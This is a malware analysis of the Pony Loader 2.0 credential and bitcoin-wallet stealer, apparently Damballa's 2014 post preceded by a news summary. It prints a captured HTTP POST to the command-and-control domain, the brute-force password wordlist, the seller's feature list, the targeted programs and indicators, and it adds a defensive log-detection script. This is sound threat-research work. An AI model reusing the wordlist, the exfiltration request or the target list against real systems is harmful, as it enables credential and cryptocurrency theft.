The wallets targeted by this threat include Bitcoin, Litecoin, MultiBit, Namecoin, Terracoin, Primecoin, Feathercoin, NovaCoin, MegaCoin, Digitalcoin, Zetacoin, Fastcoin, Tagcoin, Bytecoin, Florincoin and Luckycoin, and many others appear in the list published by Damballa's security researchers.
Pony Loader 2.0 keeps its ability to steal passwords and spread other types of malware, and contains a wordlist used to run brute-force attacks against user accounts, according to Damballa's post. These words were taken from lists published earlier after attacks on various services, and the following were added:
The people selling the malicious code are believed to be from Russia, and to be offering additional functionality related to improved credential collection.
The Trojan can infect users through malicious links in e-mails or exploit kits, so we recommend staying alert so as not to fall victim to this threat. Bitcoin's recommendation is to update to the latest versions of the client, which include a mechanism to encrypt the private keys held in the wallet with a passphrase.
Pony Loader malware has been around for years. The source code for version 1.9 was leaked on the Internet, giving criminals the opportunity to modify it to their liking. Recently, Damballa’s Threat Research team observed Pony Loader version 2.0. This variant, which ups the potential payday for criminals, is also up for sale.
On May 28, 2014, the Damballa Threat Research team obtained an unknown malware sample for analysis. After performing an initial analysis, we observed HTTP traffic to the domain 602ef0b0[.]pw, which was hosted at CloudFlare global CDN (content delivery network). CloudFlare is a legitimate network used to ensure the availability and security of websites. Malware authors commonly attempt to host their malware using known, trusted infrastructure in an effort to avoid detection and make their traffic more difficult to identify and block.
Pony Loader, also referred to as Fareit, has been used over the past several years and has the ability to steal sensitive information from a victim’s computer and install additional malware. This may include stored credentials for email, web and FTP accounts. In the past, Pony has been used to distribute the P2P Gameover Zeus Trojan.
The Pony source code has been leaked on the Internet (version 1.9), which allows anyone to obtain the source and modify it for use in an attack campaign. Upon execution of this binary, we observed the following HTTP POST request sent to the command and control server:
===========================================================================
POST /llfrty.php HTTP/1.0
Host: 602ef0b0.pw
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 375
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727)

[375-byte binary request body; not printable, omitted here]
===========================================================================
After identifying this malware as Pony / Fareit, we posted some initial information to a security mailing list. CloudFlare analysts were able to identify and suspend the account, preventing future C2 communications at the listed domain.

This version of Pony is not just the old dropper and credential stealer that has been seen with version 1.9. This Pony Loader sample had been updated to steal a victim's bitcoin wallet as well. This particular version is being sold on the criminal market as Pony Loader version 2.0.
This version was listed for sale in May 2014. However, Pony Loader 2.0 has been circulating on the Internet since early 2014. Now that the source is listed for sale, Damballa researchers expect to see an increase in this type of bitcoin-stealing malware with customized capabilities.
Pony Loader 1.9 contains a wordlist, also present in version 2.0, that is used to brute-force user accounts on a victim's computer. The attackers assembled the password list from some of the top passwords associated with several database hacks. The password list was obtained from:
Several passwords were added to this list:
1234567890
administrator
Administrator
billgates
gates
gfhjkm
ghbdtn
guest
Guest
helpassistant
HelpAssistant
mustdie
windows
The wordlist is used to enumerate local passwords with the LogonUserA Windows API call.
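As an added example (not from the Damballa post), the defender's view of this behaviour: a wordlist pushed through LogonUserA fails against several local accounts in quick succession, which shows up in the Security log as a burst of Event ID 4625 records on the infected host. The host names, account names, timestamps and thresholds below are constructed for the example.

```python
"""Flag LogonUser-style local password guessing from Windows 4625 events.
Added example, not Damballa's code. A wordlist run through LogonUserA
produces a burst of Event ID 4625 (An account failed to log on) records
on the infected host; the events below are constructed sample data."""
from collections import defaultdict
from datetime import datetime, timedelta

# (timestamp, host, target account, logon type, sub-status)
# 0xC000006A = wrong password, 0xC0000064 = account does not exist.
SAMPLE_4625 = [
    ("2014-05-28 10:15:01", "WKSTN-7", "Administrator", 2, "0xC000006A"),
    ("2014-05-28 10:15:01", "WKSTN-7", "Administrator", 2, "0xC000006A"),
    ("2014-05-28 10:15:02", "WKSTN-7", "Guest", 2, "0xC000006A"),
    ("2014-05-28 10:15:02", "WKSTN-7", "HelpAssistant", 2, "0xC000006A"),
    ("2014-05-28 10:15:03", "WKSTN-7", "Administrator", 2, "0xC000006A"),
    ("2014-05-28 10:15:03", "WKSTN-7", "Guest", 2, "0xC000006A"),
    ("2014-05-28 10:15:04", "WKSTN-7", "billgates", 2, "0xC0000064"),
    ("2014-05-28 10:15:04", "WKSTN-7", "HelpAssistant", 2, "0xC000006A"),
    # One mistyped password on another host must not raise an alert.
    ("2014-05-28 10:20:00", "WKSTN-9", "jsmith", 2, "0xC000006A"),
]

def parse(rows):
    """Turn the string timestamps into datetimes; other fields are kept."""
    return [(datetime.strptime(t, "%Y-%m-%d %H:%M:%S"), h, u, lt, ss)
            for t, h, u, lt, ss in rows]

def detect_wordlist_bruteforce(events, window_s=30, min_failures=6, min_accounts=3):
    """Return {host: sorted accounts} for hosts showing many failures spread
    over several accounts inside a short window. A user mistyping a
    password fails against one account; a wordlist fails against many."""
    by_host = defaultdict(list)
    for ts, host, user, logon_type, _substatus in sorted(events):
        if logon_type in (2, 3):  # interactive or network logon attempts
            by_host[host].append((ts, user))
    alerts = {}
    for host, recs in by_host.items():
        hit, start = set(), 0
        for end in range(len(recs)):
            # Slide the window start forward until it covers at most window_s.
            while recs[end][0] - recs[start][0] > timedelta(seconds=window_s):
                start += 1
            window = recs[start:end + 1]
            accounts = {u for _, u in window}
            if len(window) >= min_failures and len(accounts) >= min_accounts:
                hit |= accounts
        if hit:
            alerts[host] = sorted(hit)
    return alerts
```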
The criminals attempting to sell the source code for Pony 2.0 advertise the bitcoin programs that are targeted in the updated version. Damballa has verified the following list of bitcoin software in Pony version 2.0:
Electrum, MultiBit, Litecoin, Namecoin, Terracoin, Bitcoin Armory, PPCoin (Peercoin), Primecoin, Feathercoin, NovaCoin, Freicoin, Devcoin, Frankocoin, ProtoShares, MegaCoin, Quarkcoin, Worldcoin, Infinitecoin, Ixcoin, Anoncoin, BBQcoin, Digitalcoin, Mincoin, Goldcoin, Yacoin, Zetacoin, Fastcoin, I0coin, Tagcoin, Bytecoin, Florincoin, Phoenixcoin, Luckycoin, Craftcoin, Junkcoin and the original Bitcoin client.
In addition, the sellers are marketing additional features and 'upgrades' as follows (Russian to English translation):
[+] Implemented collection of passwords from Ya.Browser, FTP Disk and new versions of Opera (Chrome-based code)
[*] When the program runs on behalf of the SYSTEM user (Windows service), it will now run the loader file in the active (logged-on) user's session
[*] Improved collection of Firefox passwords; no longer dependent on the availability of SQLite3 libraries
[+] Optional redundant bootloader mode: if the first file is loaded successfully, the rest will be skipped
[+] Added option to disable the collection of passwords (just leave the loader)
[-] Fixed processing of SQLite3 files for Chrome / Firefox containing 48-bit integers
[-] Fixed a serious bug in several functions, which could lead to errors in the collection of passwords and reach program
Implemented instantaneous decoding of saved passwords for the following programs:
FAR Manager | FTPGetter | Pocomail |
Total Commander | ALFTP | IncrediMail |
WS_FTP | Internet Explorer | The Bat! |
CuteFTP | Dreamweaver | Outlook |
FlashFXP | DeluxeFTP | Thunderbird |
FileZilla | Google Chrome | FastTrackFTP |
FTP Commander | Chromium / SRWare Iron | Bitcoin |
BulletProof FTP | ChromePlus | Electrum |
SmartFTP | Bromium (Yandex Chrome) | MultiBit |
TurboFTP | Nichrome | FTP Disk |
FFFTP | Comodo Dragon | Litecoin |
CoffeeCup FTP / Sitemapper | RockMelt | Namecoin |
CoreFTP | K-Meleon | Terracoin |
FTP Explorer | Epic | Bitcoin Armory |
Frigate3 FTP | Staff-FTP | PPCoin (Peercoin) |
SecureFX | AceFTP | Primecoin |
UltraFXP | Global Downloader | Feathercoin |
FTPRush | FreshFTP | NovaCoin |
WebSitePublisher | BlazeFTP | Freicoin |
BitKinex | NETFile | Devcoin |
ExpanDrive | GoFTP | Frankocoin |
ClassicFTP | 3D-FTP | ProtoShares |
Fling | Easy FTP | MegaCoin |
SoftX | Xftp | Quarkcoin |
Directory Opus | FTP Now | Worldcoin |
FreeFTP / DirectFTP | Robo-FTP | Infinitecoin |
LeapFTP | LinasFTP | Ixcoin |
WinSCP | Cyberduck | Anoncoin |
32bit FTP | Putty | BBQcoin |
NetDrive | Notepad++ | Digitalcoin |
WebDrive | CoffeeCup Visual Site Designer | Mincoin |
FTP Control | FTPShell | Goldcoin |
Opera | FTPInfo | Yacoin |
WiseFTP | NexusFile | Zetacoin |
FTP Voyager | FastStone Browser | Fastcoin |
Firefox | CoolNovo | I0coin |
FireFTP | WinZip | Tagcoin |
SeaMonkey | Yandex.Internet / Ya.Browser | Bytecoin |
Flock | MyFTP | Florincoin |
Mozilla | sherrod FTP | Phoenixcoin |
LeechFTP | NovaFTP | Luckycoin |
Odin Secure FTP Expert | Windows Mail | Craftcoin |
WinFTP | Windows Live Mail | Junkcoin |
FTP Surfer | Becky! |
See original postings on pastebin.com here:
The builder is still being marketed with the source code and makes creating the virus possible using only a few mouse clicks:
Damballa Threat Researchers are continuing to investigate the use of this malware on the Internet. Given its capability to steal stored credentials from a wide variety of software, users should consider it risky to store passwords and bitcoin private keys in these programs.
“Your wallet.dat file is not encrypted by the Bitcoin program by default but the most current release of the Bitcoin client provides a method to encrypt with a passphrase the private keys stored in the wallet. Anyone who can access an unencrypted wallet can easily steal all of your coins. Use one of these encryption programs if there is any chance someone might gain access to your wallet.” – https://en.bitcoin.it/wiki/Securing_your_wallet#General_Solutions
Indicators:
143c9261b19118863882a2e9793d0840 – MD5 hash
602ef0b0.pw – Domain
– Isaac Palmer,
Malware Reverse Engineer